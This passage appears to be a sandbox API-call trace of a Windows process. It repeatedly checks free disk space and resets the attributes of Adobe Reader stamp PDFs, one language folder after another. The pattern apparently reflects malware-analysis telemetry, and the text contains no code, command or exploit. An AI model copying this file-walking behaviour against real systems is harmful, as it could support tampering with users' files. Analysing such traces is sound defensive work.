lpBuffer="C:\\Windows\\system32") returned 0x13 [0109.964] CoTaskMemFree (pv=0x508980) [0109.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0109.964] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.972] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR\\Dynamic.pdf", dwFileAttributes=0x80) returned 1 [0109.974] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.982] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR\\SignHere.pdf", dwFileAttributes=0x80) returned 1 [0109.985] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0109.995] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR\\StandardBusiness.pdf", dwFileAttributes=0x80) returned 1 [0109.998] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0109.998] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0109.998] CoTaskMemFree (pv=0x508980) [0109.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0110.001] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.008] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\Dynamic.pdf", dwFileAttributes=0x80) returned 1 [0110.010] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.020] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\Faces.pdf", dwFileAttributes=0x80) returned 1 [0110.023] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.030] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\Pointers.pdf", dwFileAttributes=0x80) returned 1 [0110.034] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.071] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\SignHere.pdf", dwFileAttributes=0x80) returned 1 [0110.076] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.086] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\Standard.pdf", dwFileAttributes=0x80) returned 1 [0110.090] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.097] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\StandardBusiness.pdf", dwFileAttributes=0x80) returned 1 [0110.100] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0110.100] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.100] CoTaskMemFree (pv=0x508980) [0110.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0110.101] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.109] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\Dynamic.pdf", dwFileAttributes=0x80) returned 1 [0110.111] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.119] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\SignHere.pdf", dwFileAttributes=0x80) returned 1 [0110.122] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.132] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\PTB\\StandardBusiness.pdf", dwFileAttributes=0x80) returned 1 [0110.135] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0110.135] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.135] CoTaskMemFree (pv=0x508980) [0110.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0110.139] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.148] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\Dynamic.pdf", dwFileAttributes=0x80) returned 1 [0110.151] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.157] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\Faces.pdf", dwFileAttributes=0x80) returned 1 [0110.160] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.167] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\Pointers.pdf", dwFileAttributes=0x80) returned 1 [0110.170] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.178] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\SignHere.pdf", dwFileAttributes=0x80) returned 1 [0110.180] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.193] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\Standard.pdf", dwFileAttributes=0x80) returned 1 [0110.196] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.214] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\StandardBusiness.pdf", dwFileAttributes=0x80) returned 1 [0110.218] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0110.218] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.218] CoTaskMemFree (pv=0x508980) [0110.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0110.222] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.230] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\Dynamic.pdf", dwFileAttributes=0x80) returned 1 [0110.233] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.239] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\Faces.pdf", dwFileAttributes=0x80) returned 1 [0110.242] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.249] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\Pointers.pdf", dwFileAttributes=0x80) returned 1 [0110.252] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.258] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\SignHere.pdf", dwFileAttributes=0x80) returned 1 [0110.261] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.272] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\Standard.pdf", dwFileAttributes=0x80) returned 1 [0110.275] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.285] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUS\\StandardBusiness.pdf", dwFileAttributes=0x80) returned 1 [0110.288] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0110.288] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.288] CoTaskMemFree (pv=0x508980) [0110.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0110.292] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.298] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Dynamic.pdf", dwFileAttributes=0x80) returned 1 [0110.301] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.307] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Faces.pdf", dwFileAttributes=0x80) returned 1 [0110.310] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.317] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Pointers.pdf", dwFileAttributes=0x80) returned 1 [0110.320] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.327] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\SignHere.pdf", dwFileAttributes=0x80) returned 1 [0110.330] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.340] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Standard.pdf", dwFileAttributes=0x80) returned 1 [0110.344] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.352] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\StandardBusiness.pdf", dwFileAttributes=0x80) returned 1 [0110.355] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0110.355] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.355] CoTaskMemFree (pv=0x508980) [0110.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0110.359] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.371] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\Dynamic.pdf", dwFileAttributes=0x80) returned 1 [0110.374] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.380] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\Faces.pdf", dwFileAttributes=0x80) returned 1 [0110.383] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.389] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\Pointers.pdf", dwFileAttributes=0x80) returned 1 [0110.392] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.400] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\SignHere.pdf", dwFileAttributes=0x80) returned 1 [0110.403] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.414] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\Standard.pdf", dwFileAttributes=0x80) returned 1 [0110.417] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.432] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SLV\\StandardBusiness.pdf", dwFileAttributes=0x80) returned 1 [0110.435] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0110.435] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.435] CoTaskMemFree (pv=0x508980) [0110.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0110.437] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.444] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\Dynamic.pdf", dwFileAttributes=0x80) returned 1 [0110.447] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.458] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\SignHere.pdf", dwFileAttributes=0x80) returned 1 [0110.461] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.472] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SUO\\StandardBusiness.pdf", dwFileAttributes=0x80) returned 1 [0110.475] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0110.475] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.475] CoTaskMemFree (pv=0x508980) [0110.475] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0110.476] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.483] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\Dynamic.pdf", dwFileAttributes=0x80) returned 1 [0110.486] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.496] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\SignHere.pdf", dwFileAttributes=0x80) returned 1 [0110.498] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.507] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\StandardBusiness.pdf", dwFileAttributes=0x80) returned 1 [0110.510] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0110.510] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0110.510] CoTaskMemFree (pv=0x508980) [0110.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0110.517] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0110.524] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 